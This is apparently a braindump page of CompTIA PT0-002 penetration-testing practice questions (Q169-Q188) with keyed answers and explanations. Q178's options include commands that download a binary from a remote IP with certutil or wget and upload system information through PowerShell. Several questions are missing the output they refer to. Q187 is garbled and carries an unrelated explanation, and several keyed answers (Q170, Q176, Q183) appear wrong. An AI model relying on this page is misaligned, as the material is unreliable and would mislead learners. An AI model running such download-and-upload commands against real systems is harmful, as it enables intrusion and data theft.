• Home
  • Articles
  • Get Ready to Pass the PT0-002 exam with CompTIA Latest Practice Exam [Q169-Q188]

Get Ready to Pass the PT0-002 exam with CompTIA Latest Practice Exam [Q169-Q188]

Share

Get Ready to Pass the PT0-002 exam with CompTIA Latest Practice Exam

Get Prepared for Your PT0-002 Exam With Actual CompTIA Study Guide!

NEW QUESTION # 169
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  • A. Comma
  • B. Semicolon
  • C. Single quote
  • D. Double dash

Answer: C

Explanation:
Explanation
A single quote (') is a common character used to test for SQL injection vulnerabilities, which occur when user input is directly passed to a database query. A single quote can terminate a string literal and allow an attacker to inject malicious SQL commands. For example, if the search form uses the query SELECT * FROM products WHERE name LIKE '%user_input%', then entering a single quote as user input would result in an error or unexpected behavior


NEW QUESTION # 170
A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap --open 192.168.0.1-254, uniq
  • B. nmap -o 192.168.0.1-254, cut -f 2
  • C. nmap -sn 192.168.0.1-254 , grep "Nmap scan" | awk '{print S5}'
  • D. nmap -oG list.txt 192.168.0.1-254 , sort

Answer: B


NEW QUESTION # 171
A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

  • A. Building a scheduled task for execution
  • B. Executing a file on the remote system
  • C. Mapping a share to a remote system
  • D. Creating a new process on all domain systems
  • E. Setting up a reverse shell from a remote system
  • F. Adding an additional IP address on the compromised system
  • G. Redirecting output from a file to a remote system

Answer: B,C

Explanation:
Explanation
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.


NEW QUESTION # 172
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:


NEW QUESTION # 173
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

  • A. Ethercap
  • B. Nmap
  • C. Nikto
  • D. Cain and Abel

Answer: C

Explanation:
Explanation
https://hackertarget.com/nikto-website-scanner/


NEW QUESTION # 174
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Netcat and cURL
  • B. Burp Suite and DIRB
  • C. Hydra and crunch
  • D. Nmap and OWASP ZAP

Answer: B


NEW QUESTION # 175
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The executive summary and information regarding the testing company
  • B. The rules of engagement from the assessment
  • C. A quick description of the vulnerability and a high-level control to fix it
  • D. Information regarding the business impact if compromised

Answer: C

Explanation:
The systems administrator and the technical stuff would be more interested in the technical aspect of the findings


NEW QUESTION # 176
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  • A. RFID tagging
  • B. Meta tagging
  • C. Tag nesting
  • D. RFID cloning

Answer: B


NEW QUESTION # 177
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option D
  • B. Option B
  • C. Option A
  • D. Option C

Answer: C


NEW QUESTION # 178
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • B. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

Answer: C

Explanation:
Explanation
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk


NEW QUESTION # 179
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. Supervisors and controllers are on a separate virtual network by default.
  • B. PLCs will not act upon commands injected over the network.
  • C. Supervisory systems will detect a malicious injection of code/commands.
  • D. Controllers will not validate the origin of commands.

Answer: D


NEW QUESTION # 180
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

  • A. Maintain confidentiality of the findings.
  • B. Identify all the vulnerabilities in the environment.
  • C. Limit invasiveness based on scope.
  • D. Uncover potential criminal activity based on the evidence gathered.

Answer: C


NEW QUESTION # 181
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Traffic sniffing
  • B. A ping sweep
  • C. An Nmap scan
  • D. Open-source research
  • E. Port knocking
  • F. A vulnerability scan

Answer: A,D


NEW QUESTION # 182
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Eliminate network management and control interfaces.
  • B. Enforce enhanced password complexity requirements.
  • C. Disable or upgrade SSH daemon.
  • D. Disable HTTP/301 redirect configuration.
  • E. Implement a better method for authentication.
  • F. Create an out-of-band network for management.

Answer: D,F


NEW QUESTION # 183
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

  • A. This device is most likely a proxy server forwarding requests over TCP/443.
  • B. This device is most likely a gateway with in-band management services.
  • C. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
  • D. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

Answer: D


NEW QUESTION # 184
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?

  • A. The command requires the -port 135 option.
  • B. The tester input the incorrect IP address.
  • C. PowerShell requires administrative privilege.
  • D. An account for RDP does not exist on the server.

Answer: D


NEW QUESTION # 185
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Answer:

Explanation:

Explanation
Graphical user interface Description automatically generated


NEW QUESTION # 186
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

  • A. Spawn a local shell.
  • B. Disable NIC.
  • C. List processes.
  • D. Change the MAC address

Answer: A

Explanation:
Explanation
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.


NEW QUESTION # 187
A penetration tester wrote the following Bash script to brute force a local service password:
..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

  • A. .e
    cho "The correct password is $p" && break)
    o "The correct password is $p" I break
  • B. ( echo "The correct password is $p" && break )
  • C. e
    cho "The correct password is Sp" && break)
    echo "The correct password is $p" && break)
  • D. ..e
    cho "The correct password is $p" && break)
    ho "The correct password is $p" I| break
  • E. .
    { echo "The correct password is $p" && break )
    With

Answer: A

Explanation:
Explanation
CeWL is a tool that can be used to crawl a website and build a wordlist using the data recovered to crack the password on the website. CeWL stands for Custom Word List generator, and it is a Ruby script that spiders a given website up to a specified depth and returns a list of words that can be used for password cracking or other purposes. CeWL can also generate wordlists based on metadata, email addresses, author names, or external links found on the website. CeWL can help a penetration tester create customized wordlists that are tailored to the target website and increase the chances of success for password cracking attacks. DirBuster is a tool that can be used to brute force directories and files names on web servers. w3af is a tool that can be used to scan web applications for vulnerabilities and exploits. Patator is a tool that can be used to perform brute force attacks against various protocols and services.


NEW QUESTION # 188
......

Pass Your Next PT0-002 Certification Exam Easily & Hassle Free: https://certtree.2pass4sure.com/CompTIA-PenTest/PT0-002-actual-exam-braindumps.html

Related Articles

more
CompTIA PT0-002 Certification Practice Exam